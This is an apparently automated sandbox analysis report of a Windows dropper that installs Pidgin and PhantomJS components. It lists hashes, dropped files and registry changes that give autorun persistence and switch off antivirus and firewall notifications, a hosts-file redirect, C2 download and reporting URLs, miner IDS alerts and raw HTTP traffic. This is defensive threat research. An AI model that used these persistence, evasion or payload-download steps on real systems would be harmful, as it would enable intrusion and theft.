Gen.Variant.Symmi.25089_bf17fd7488
Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour:
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: bf17fd7488b5085ddf7a2256a2738686
SHA1: 1e4c7f2e47702d308284f1258b017b4676fb9639
SHA256: 9def8d045360746779cfca6a77e0b1a224c953aff796c546503b9d920fdb50cb
SSDeep: 24576:kRGPjmz9nAO1n0D58gCLzull4upq/M4ck:g9bgCL6laK
Size: 818688 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-16 01:24:43
Analyzed on: WindowsXP SP3 32-bit
Summary:
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
ztvzeenmej.exe:1532
jr1yus5tfepmae.exe:4792
purple.exe:6128
unzip.exe:6056
unzip.exe:5544
jr1yus5tfzmnae.exe:5420
jr1yus5tfaskaetbuftx.exe:2740
dspdzkk.exe:3736
dspdzkk.exe:4868
jr1yus5tfmq8ae.exe:3020
%original file name%.exe:232
The Malware injects its code into the following process(es):
No processes have been created.
File activity
The process ztvzeenmej.exe:1532 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\vqtzdvifamove\tst (10 bytes)
The process purple.exe:6128 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\certificates\x509\tls_peers\login.yahoo.com.save (6 bytes)
The process unzip.exe:6056 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\vqtzdvifamove\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\vqtzdvifamove\purple\plugins\xmppconsole.dll (37 bytes)
%System%\vqtzdvifamove\purple\libnspr4.dll (1281 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\libjabber.dll (2321 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\vqtzdvifamove\purple\libxml2-2.dll (7971 bytes)
%System%\vqtzdvifamove\purple\libglib-2.0-0.dll (7726 bytes)
%System%\vqtzdvifamove\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\vqtzdvifamove\purple\ssl3.dll (1281 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\vqtzdvifamove\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\vqtzdvifamove\purple\purple.exe (25 bytes)
%System%\vqtzdvifamove\purple\nss3.dll (5873 bytes)
%System%\vqtzdvifamove\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslANONYMOUS.dll (601 bytes)
%System%\vqtzdvifamove\purple\sqlite3.dll (3073 bytes)
%System%\vqtzdvifamove\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\vqtzdvifamove\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\libyahoo.dll (22 bytes)
%System%\vqtzdvifamove\purple\libsasl.dll (673 bytes)
%System%\vqtzdvifamove\purple\smime3.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\statenotify.dll (15 bytes)
%System%\vqtzdvifamove\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\vqtzdvifamove\purple\softokn3.dll (673 bytes)
%System%\vqtzdvifamove\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\vqtzdvifamove\purple\intl.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\ssl.dll (12 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\vqtzdvifamove\purple\freebl3.dll (1425 bytes)
%System%\vqtzdvifamove\purple\plugins\ssl-nss.dll (28 bytes)
%System%\vqtzdvifamove\purple\zlib1.dll (673 bytes)
%System%\vqtzdvifamove\purple\libssp-0.dll (36 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\vqtzdvifamove\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\plugins\libxmpp.dll (21 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\vqtzdvifamove\purple\nssutil3.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\xmppdisco.dll (44 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\vqtzdvifamove\purple\libymsg.dll (1281 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\vqtzdvifamove\purple\libplc4.dll (15 bytes)
%System%\vqtzdvifamove\purple\libplds4.dll (14 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslGSSAPI.dll (36 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\vqtzdvifamove\purple\libpurple.dll (5873 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\vqtzdvifamove\purple\libgthread-2.0-0.dll (44 bytes)
The process unzip.exe:5544 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\vqtzdvifamove\dropbox\clientutils.js (35 bytes)
%System%\vqtzdvifamove\dropbox\colorizer.js (4 bytes)
%System%\vqtzdvifamove\dropbox\bootstrap.js (14 bytes)
%System%\vqtzdvifamove\dropbox\casper.js (601 bytes)
%System%\vqtzdvifamove\dropbox\xunit.js (6 bytes)
%System%\vqtzdvifamove\dropbox\mouse.js (4 bytes)
%System%\vqtzdvifamove\dropbox\cli.js (5 bytes)
%System%\vqtzdvifamove\dropbox\dropbox2.js (25 bytes)
%System%\vqtzdvifamove\dropbox\querystring.js (5 bytes)
%System%\vqtzdvifamove\dropbox\utils.js (21 bytes)
%System%\vqtzdvifamove\dropbox\package.json (767 bytes)
%System%\vqtzdvifamove\dropbox\http.js (2 bytes)
%System%\vqtzdvifamove\dropbox\tester.js (59 bytes)
%System%\vqtzdvifamove\dropbox\pagestack.js (4 bytes)
%System%\vqtzdvifamove\dropbox\events.js (8 bytes)
%System%\vqtzdvifamove\dropbox\phantomjs197.exe (53130 bytes)
%System%\vqtzdvifamove\dropbox\googleTakeout.js (14 bytes)
The process jr1yus5tfaskaetbuftx.exe:2740 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\dspdzkk.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\vqtzdvifamove\tst (10 bytes)
%System%\vqtzdvifamove\etc (10 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process dspdzkk.exe:3736 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%WinDir%\Temp\jr1yus5tfzqkae.exe (1940 bytes)
%System%\vqtzdvifamove\rng (312 bytes)
%System%\vqtzdvifamove\tst (10 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%System%\unzip.exe (7100 bytes)
%System%\vqtzdvifamove\purple\purple.zip (90422 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\vqtzdvifamove\por (1 bytes)
%WinDir%\Temp\jr1yus5tfepmae.exe (35 bytes)
%System%\ztvzeenmej.exe (5873 bytes)
%System%\vqtzdvifamove\cfg (821 bytes)
%WinDir%\Temp\jr1yus5tfzmnae.exe (35 bytes)
%System%\vqtzdvifamove\ihst (164 bytes)
%System%\vqtzdvifamove\run (10 bytes)
%System%\drivers\etc\hosts (48 bytes)
%WinDir%\Temp\jr1yus5tfmq8ae.exe (5873 bytes)
%System%\vqtzdvifamove\dropbox\dropbox.zip (181699 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\jr1yus5tfzmnae.exe (0 bytes)
%WinDir%\Temp\jr1yus5tfzqkae.exe (0 bytes)
%WinDir%\Temp\jr1yus5tfmq8ae.exe (0 bytes)
%WinDir%\Temp\jr1yus5tfepmae.exe (0 bytes)
The process dspdzkk.exe:4868 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\vqtzdvifamove\tst (10 bytes)
The process jr1yus5tfmq8ae.exe:3020 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\vqtzdvifamove\tst (10 bytes)
The process %original file name%.exe:232 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jr1yus5tfaskaetbuftx.exe (3891 bytes)
%System%\vqtzdvifamove\tst (10 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jr1yus5tfaskaetbuftx.exe (0 bytes)
Registry activity
The process jr1yus5tfepmae.exe:4792 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 84 5D 80 BB FD 25 52 CF 56 84 6F 7C 8F 00 0B"
The process purple.exe:6128 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D DF 81 34 E0 23 23 99 41 17 A8 8C 37 AC F9 DE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process unzip.exe:6056 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 2B A1 5F 28 C6 FF 17 59 45 1D 19 2E FB 0C C2"
The process unzip.exe:5544 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 FB 59 F8 2A 7A 98 59 10 08 57 6B CC AC 93 05"
The process jr1yus5tfzmnae.exe:5420 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 CD 38 96 7E 8C 62 CF 88 1E B4 69 24 FB 54 20"
The process jr1yus5tfaskaetbuftx.exe:2740 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 37 03 6E 87 88 80 47 91 77 89 25 04 93 CA BE"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AuthIP Procedure Presentation Office" = "%System%\dspdzkk.exe"
The process dspdzkk.exe:3736 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 98 B7 DE 61 CF 66 29 B0 42 B2 DC BC A9 CF 22"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The Malware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process jr1yus5tfmq8ae.exe:3020 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 07 D9 BF FB E3 31 77 97 77 D0 F2 A1 CF DF 70"
Dropped PE files
| MD5 | File path |
|---|---|
| fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
| c814feb9e90206f83de6232e76b52e4f | c:\WINDOWS\system32\vqtzdvifamove\dropbox\phantomjs197.exe |
| d16fb37fb64925e5fcb9c5f7f18f8138 | c:\WINDOWS\system32\vqtzdvifamove\purple\freebl3.dll |
| 9f95ece3d2b3909de4d9147c4d93f976 | c:\WINDOWS\system32\vqtzdvifamove\purple\intl.dll |
| e2ac23418781f632311513944edd0a4c | c:\WINDOWS\system32\vqtzdvifamove\purple\libgcc_s_dw2-1.dll |
| 18e88b04da123bf05b07ff60a4e96654 | c:\WINDOWS\system32\vqtzdvifamove\purple\libglib-2.0-0.dll |
| b0b2396fc6413016a45a5e8ca2ea8152 | c:\WINDOWS\system32\vqtzdvifamove\purple\libgmodule-2.0-0.dll |
| 356d697647a480562c4e2e921b13f8ed | c:\WINDOWS\system32\vqtzdvifamove\purple\libgobject-2.0-0.dll |
| 7ad6f303082b382bff7bafbab246c61f | c:\WINDOWS\system32\vqtzdvifamove\purple\libgthread-2.0-0.dll |
| 158b8d977b663dadbf052dc3ff625db7 | c:\WINDOWS\system32\vqtzdvifamove\purple\libjabber.dll |
| 7aa32658927457f6bbc917bfed740060 | c:\WINDOWS\system32\vqtzdvifamove\purple\libnspr4.dll |
| ff42fa60aeee5b145a495b2dc03d7be5 | c:\WINDOWS\system32\vqtzdvifamove\purple\libplc4.dll |
| 1167d1b5699ff7f3a3946a714116b604 | c:\WINDOWS\system32\vqtzdvifamove\purple\libplds4.dll |
| 6a2fae3c859ffb708b592bb4eecb98f5 | c:\WINDOWS\system32\vqtzdvifamove\purple\libpurple.dll |
| d7dc3c8976d465a72befaa20d652d0a2 | c:\WINDOWS\system32\vqtzdvifamove\purple\libsasl.dll |
| 550b3ec2d6a2db0036b4e6e057b54768 | c:\WINDOWS\system32\vqtzdvifamove\purple\libssp-0.dll |
| d8daf5ada5cc24d8b0bb4f330e8e83e3 | c:\WINDOWS\system32\vqtzdvifamove\purple\libxml2-2.dll |
| 9950a16dcb7b6059560310ff4b9c4d8b | c:\WINDOWS\system32\vqtzdvifamove\purple\libymsg.dll |
| 0e77713336837ec8946b8a0f0ae117c6 | c:\WINDOWS\system32\vqtzdvifamove\purple\nss3.dll |
| 3b74e32535fbd58228232f58b924c3fe | c:\WINDOWS\system32\vqtzdvifamove\purple\nssutil3.dll |
| d3766d16190904485e566144ba3214da | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\libxmpp.dll |
| 834d15d762c66a2037a25b0d9c235f09 | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\libyahoo.dll |
| f682806675838619bb12e32a4da5cae2 | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\ssl-nss.dll |
| 7e58936c483f06ae1aa81df13d64e031 | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\ssl.dll |
| e67de22684cf17bd99998058a5d5d657 | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\statenotify.dll |
| 1a0a90e693490d58d94542bc6a0bfbf2 | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\xmppconsole.dll |
| 53da77fb3ba39dd8b4f5d9f6ae082717 | c:\WINDOWS\system32\vqtzdvifamove\purple\plugins\xmppdisco.dll |
| 833ae1fd4f4a642a3b8c1fe3c8a57d6a | c:\WINDOWS\system32\vqtzdvifamove\purple\purple.exe |
| 1a3c18e050ef86cb6d0284f51ecb3e39 | c:\WINDOWS\system32\vqtzdvifamove\purple\sasl2\saslANONYMOUS.dll |
| 38c529b4daa4293548f6f367ea31d955 | c:\WINDOWS\system32\vqtzdvifamove\purple\sasl2\saslCRAMMD5.dll |
| ce06799381174f3524c0893f645dff00 | c:\WINDOWS\system32\vqtzdvifamove\purple\sasl2\saslDIGESTMD5.dll |
| 12b053c2eccc8285d69323b80ee9ddf1 | c:\WINDOWS\system32\vqtzdvifamove\purple\sasl2\saslGSSAPI.dll |
| 521492b4ac37fa5a1896eb8ba7b0eaf1 | c:\WINDOWS\system32\vqtzdvifamove\purple\sasl2\saslLOGIN.dll |
| 6ce549e4c41074a837712dfa041d05ef | c:\WINDOWS\system32\vqtzdvifamove\purple\sasl2\saslPLAIN.dll |
| c04ee77a36b82536269bff437b0cf4e0 | c:\WINDOWS\system32\vqtzdvifamove\purple\smime3.dll |
| b1dde425a07484c3d0c8bf4ad0dc1e59 | c:\WINDOWS\system32\vqtzdvifamove\purple\softokn3.dll |
| 624c05297992577eccaabb0f646b5875 | c:\WINDOWS\system32\vqtzdvifamove\purple\sqlite3.dll |
| e64e775bce8695c136feba29e9396d7f | c:\WINDOWS\system32\vqtzdvifamove\purple\ssl3.dll |
| 5ff2481c69e5dd4107c44ab42cc27ba2 | c:\WINDOWS\system32\vqtzdvifamove\purple\zlib1.dll |
| 14ff2121eda9993823b5b7e32a6475c9 | c:\WINDOWS\system32\win32drkclient.exe |
| ee117a41ec7d1a8a78ec55ae1d66909a | c:\WINDOWS\system32\win64drkaesent.exe |
| 897914962939e2406d9a25261cf7b604 | c:\WINDOWS\system32\win64drkclient.exe |
HOSTS file anomalies
The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 48 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | mail.yahoo.com |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 639414 | 639488 | 4.70269 | 9df72b952afe360807a66bb43ba548e4 |
| .rdata | 647168 | 52568 | 52736 | 3.66609 | afa6d7dc3e91fcc1abea6aa53461e0a8 |
| .data | 700416 | 159228 | 125440 | 5.49911 | b9fb8d20b8c778150e30877953679f42 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=028&sox=3cd13400 | |
| hxxp://tablefruit.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3cd13400&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU 3040 @ 1.86GHz (1861 MHz)&mode=sox&v=028&sox=3cd13400&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3cd13400&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/dep/dropbox.zip | |
| hxxp://tablefruit.net/dep/win64drkclient.exe | |
| hxxp://tablefruit.net/forum/search.php?method=hostname&host=mail.yahoo.com&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=setvar&key=connected&value=3e550202&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=checkport&port=20501&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/dep/win32drkclient.exe | |
| hxxp://tablefruit.net/dep/win64drkaesent.exe | |
| hxxp://tablefruit.net/dep/unzip.exe | |
| hxxp://tablefruit.net/forum/search.php?method=dep&noxor&file=unzip.exe&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/dep/purple.zip | |
| hxxp://tablefruit.net/forum/search.php?method=all&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=setvar&key=connected&value=3d90c202&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://vcs1.us1.msg.vip.gq1.yahoo.com/capacity | |
| hxxp://tablefruit.net/forum/pingtest | |
| hxxp://tablefruit.net/forum/search.php?method=post&type=pha_log&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=setvar&key=ping&value=828&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=setvar&key=stopped&value=3e550202&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://tablefruit.net/forum/search.php?method=post&type=libpurple&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://vcs1.msg.yahoo.com/capacity | |
| hxxp://partyorderly.net/dep/purple.zip | |
| hxxp://partyorderly.net/dep/dropbox.zip | |
| hxxp://partyorderly.net/dep/win64drkaesent.exe | |
| hxxp://partyorderly.net/dep/unzip.exe | |
| hxxp://partyorderly.net/dep/win32drkclient.exe | |
| hxxp://partyorderly.net/dep/win64drkclient.exe | |
| login.yahoo.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response
Traffic
GET /dep/unzip.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:39 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 14 Feb 2005 18:03:38 GMT
Accept-Ranges: bytes
Content-Length: 164864
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......B
[email protected]...........
................ .....................................................
......................................................................
...........................text...$X.......Z..................`..`.dat
a........p.......^[email protected]..............................
.......idata...............`[email protected]..
............@.........................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U.......$........C..h.....
1.]...U.......$........C..H.....1.]...U......U...$..d.C...]..v...'....
U......U...$..H.C...]..v...'....U..S..$..$..@..}O.......C....$.pB.....
B..M..E......L$..T$..U..T$..D$..pB...K....qB...t^..qB...<.C...t..D$
..Z...$..K....<.C....t....qB..\$..J0..$..K....<.C....t....qB..\$
..JP..$.{K...fK.....qB.....C...4K.....pB......pB...$.\$..L$..........J
....$..N....&....U......]..M.1..u.1.....=..........=....sg=....t....u.
.]...]....D$.......$......J.....t"..t...$......&......'...........<<< skipped >>>
GET /forum/search.php?method=checkport&port=20501&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3e550202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:00:23 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 30
Server: YTS/1.20.28
GET /forum/search.php?method=setvar&key=stopped&value=3e550202&mode=sox&v=028&sox=3cd13400&lport=1&rsid=3d90c202&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:01:16 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.20.28.............
GET /forum/pingtest HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Sat, 03 May 2014 06:01:15 GMT
